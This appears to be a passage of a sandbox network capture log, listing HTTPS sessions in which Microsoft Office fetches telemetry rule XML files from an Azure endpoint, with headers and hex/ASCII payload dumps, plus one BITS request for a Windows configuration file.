                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a4b0abd9-001e-0049-4af2-3a5bd5000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095427Z-1777c6cb754g9zd5hC1TEBfvpw00000009gg00000000c253
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:27 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      92192.168.2.64981613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e045c2d1-201e-003c-718c-3a30f9000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-r1d97b99577ndm4rhC1TEBf0ps00000008w00000000034n6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      93192.168.2.64982013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 07391e4c-a01e-0032-018c-3a1949000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-185f5d8b95cf7qddhC1NYC66an0000000a3g000000009rwb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      94192.168.2.64981713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-1777c6cb754lvj6mhC1TEBke9400000009g0000000007b4y
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      95192.168.2.64981913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: fcb7274f-701e-003e-5908-3b79b3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-r1d97b99577d6qrbhC1TEBux5s00000008tg0000000086dp
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      96192.168.2.64982113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1389
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c363d3e9-d01e-0028-158c-3a7896000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-185f5d8b95csp6jmhC1NYCwy6s00000009x000000000fcu6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      97192.168.2.649823184.28.90.27443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF17)
                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=24731
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      98192.168.2.64982413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1352
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 3fc08cf2-401e-0067-7b02-3b09c2000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-r1d97b99577gg97qhC1TEBcrf400000008cg00000000fgwd
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      99192.168.2.64982513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f909e935-c01e-0049-358c-3aac27000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-185f5d8b95cqnkdjhC1NYCm8w800000009wg000000009bbb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      100192.168.2.64982613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                      x-ms-request-id: df1e4bb0-c01e-0034-6f8a-3a2af6000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-1777c6cb754mqztshC1TEB4mkc00000009hg000000002qq2
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
